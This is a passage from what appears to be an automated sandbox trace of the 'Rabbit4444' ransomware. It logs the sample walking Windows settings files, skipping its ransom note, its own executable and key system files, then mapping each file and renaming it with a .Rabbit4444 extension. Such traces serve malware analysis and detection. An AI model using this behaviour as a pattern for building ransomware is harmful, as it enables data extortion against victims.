(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_selecticonstoappearontaskbar.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_selecticonstoappearontaskbar.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.702] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30db7333, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x30db7333, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", cAlternateFileName="AAE32A~1.SET")) returned 1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2=".") returned 1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="..") returned 1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="windows") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="boot") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.702] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.702] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms") returned="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms" [0057.702] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.702] lstrlenW (lpString="AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms") returned 71 [0057.702] lstrlenW (lpString="Rabbit4444") returned 10 [0057.703] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.703] lstrlenW (lpString=".dll") returned 4 [0057.703] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.703] lstrlenW (lpString=".lnk") returned 4 [0057.703] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.703] lstrlenW (lpString=".ini") returned 4 [0057.703] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.703] lstrlenW (lpString=".sys") returned 4 [0057.703] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_showappnotifications.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.703] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.703] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14901382495) returned 1 [0057.703] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1312) returned 1 [0057.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0057.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0057.703] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.737] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.737] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.738] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.738] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.738] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14904869717) returned 1 [0057.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0057.745] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0057.745] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.745] CloseHandle (hObject=0x298) returned 1 [0057.745] CloseHandle (hObject=0x278) returned 1 [0057.745] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms.Rabbit4444") returned 199 [0057.746] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_showappnotifications.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_showappnotifications.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.746] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3114abd4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3114abd4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x516, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", cAlternateFileName="AAC020~1.SET")) returned 1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.747] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.747] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms") returned="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms" [0057.747] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.747] lstrlenW (lpString="AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms") returned 69 [0057.747] lstrlenW (lpString="Rabbit4444") returned 10 [0057.747] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.747] lstrlenW (lpString=".dll") returned 4 [0057.747] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.747] lstrlenW (lpString=".lnk") returned 4 [0057.747] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.747] lstrlenW (lpString=".ini") returned 4 [0057.747] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.747] lstrlenW (lpString=".sys") returned 4 [0057.747] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.747] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_softlandingenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.748] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.748] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14905856520) returned 1 [0057.748] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1302) returned 1 [0057.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0057.748] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0057.748] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.749] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.750] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.750] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14906118418) returned 1 [0057.750] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0057.751] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0057.751] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.751] CloseHandle (hObject=0x298) returned 1 [0057.751] CloseHandle (hObject=0x278) returned 1 [0057.751] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.751] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_softlandingenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_softlandingenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.752] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3133aa56, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3133aa56, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", cAlternateFileName="AAF88B~1.SET")) returned 1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2=".") returned 1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="..") returned 1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="windows") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="boot") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.752] lstrcmpiW (lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.752] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms") returned="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms" [0057.752] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.752] lstrlenW (lpString="AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms") returned 62 [0057.752] lstrlenW (lpString="Rabbit4444") returned 10 [0057.752] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.752] lstrlenW (lpString=".dll") returned 4 [0057.752] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.752] lstrlenW (lpString=".lnk") returned 4 [0057.752] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.752] lstrlenW (lpString=".ini") returned 4 [0057.752] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.752] lstrlenW (lpString=".sys") returned 4 [0057.752] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.753] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_systemicons.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.753] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.753] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14906355164) returned 1 [0057.753] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1259) returned 1 [0057.753] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0057.753] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.753] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.754] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.755] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.755] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.756] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14906630295) returned 1 [0057.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0057.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.756] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.756] CloseHandle (hObject=0x298) returned 1 [0057.756] CloseHandle (hObject=0x278) returned 1 [0057.756] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms.Rabbit4444") returned 190 [0057.756] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_systemicons.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_notifications_systemicons.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.757] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31504696, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31504696, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x507, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", cAlternateFileName="AA74A9~1.SET")) returned 1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2=".") returned 1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="..") returned 1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="windows") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="boot") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.757] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.757] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms" [0057.757] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.757] lstrlenW (lpString="AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms") returned 68 [0057.757] lstrlenW (lpString="Rabbit4444") returned 10 [0057.757] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.757] lstrlenW (lpString=".dll") returned 4 [0057.757] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.757] lstrlenW (lpString=".lnk") returned 4 [0057.757] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.757] lstrlenW (lpString=".ini") returned 4 [0057.757] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.758] lstrlenW (lpString=".sys") returned 4 [0057.758] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.758] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms" (normalized: 